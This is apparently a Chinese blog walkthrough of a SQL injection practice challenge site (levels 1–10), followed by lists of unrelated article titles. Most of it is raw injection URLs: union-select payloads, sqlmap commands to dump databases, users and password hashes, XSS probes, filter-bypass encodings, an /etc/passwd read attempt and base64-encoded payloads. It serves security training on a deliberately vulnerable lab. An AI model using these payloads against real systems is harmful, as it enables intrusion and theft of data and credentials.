http://www.zixem.altervista.org/SQLi/

第一关

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+

sqlmap -u "注入点" --dbs

sqlmap -u "注入点" -D xx --tables

sqlmap -u "注入点" -D XX -T XX --columns

sqlmap -u "注入点" -D XX -T XX -C XX --dump

sqlmap -u "注入点" --users

sqlmap -u "注入点" --passwords

xss

http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

第二关

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+

第三关

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+

第四关

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+

m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+

第五关

http://www.zixem.altervista.org/SQLi/login_lvl5.php

http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

第六关

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+

xss
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E

sqlmap 跑盲注

第七关

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+

无回显

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

第八关

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

特殊字符绕过

A plus sign (+)

A simple URL encoded space (%20)

A null byte (%00)

A newline (%0a)

A tab (%09)

A carriage return (%0d)

构造poc

空格%20

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

空字节%00

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+

换行\n %0a

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+

回车%0d

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+

Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

Tab %09

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--

大小写

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--

url加密

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20

使用特殊字符   *

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--

关键词替换

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

第九关

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+

第十关

http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

构造编码

1 AND 1=2 UNION SELECT 1,2--

使用Uuencode decoder 进行解码

<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```

base64加密

PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

构造注入语句

1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

结果

M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```

64编码

TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg


参考文档 https://www.cnblogs.com/hack404/p/10387894.html

最新文章

  1. iOS可视化动态绘制连通图
  2. (0)ASP.NET Core 简单介绍 和开发环境搭建 - ASP.NET从MVC5升级到MVC6
  3. 23-React Render Element
  4. js中转移符
  5. LeetCode : 93. Restore IP Addresses
  6. VS2010 自动跳过代码现象
  7. ViewPager,实现真正的无限循环(定时+手动)
  8. Spring中的单例一二
  9. (C++) 基本面试题(整理)
  10. win7下代替IDM的下载工具
  11. TX enqueue DRM
  12. Get Cordova Ready for Grunt and CoffeeScript
  13. Flex移动皮肤开发(三)
  14. Innobackupex全备恢复(原理、演示)
  15. win7及以上系统打开chm空白或显示&quot;无法打开&quot;的2个解决方案
  16. [hdu4694]Important Sisters
  17. ListView展示不同布局需要注意的地方
  18. 弹性盒模型flex
  19. 【JS面试向】选择排序、桶排序、冒泡排序和快速排序简介
  20. 【Java】接口(interface)VS抽象类

热门文章

  1. org.openqa.selenium.NoSuchElementException: no such element: Unable to locate element
  2. redhat6版本网卡绑定做bond
  3. Linux环境下安装配置vsftpd服务(三种认证模式)
  4. [翻译]Go与C#对比 第三篇:编译、运行时、类型系统、模块和其它的一切
  5. SQL修改表约束实现
  6. GitHub Desktop的使用,创建项目、上传文件,设置忽略文件
  7. cos中的文件结构(DF/EF/MF/FID/AID/SFI..)
  8. JWT原理实现代码
  9. FutureTask相关
  10. 4、git和gitlab的配置(1)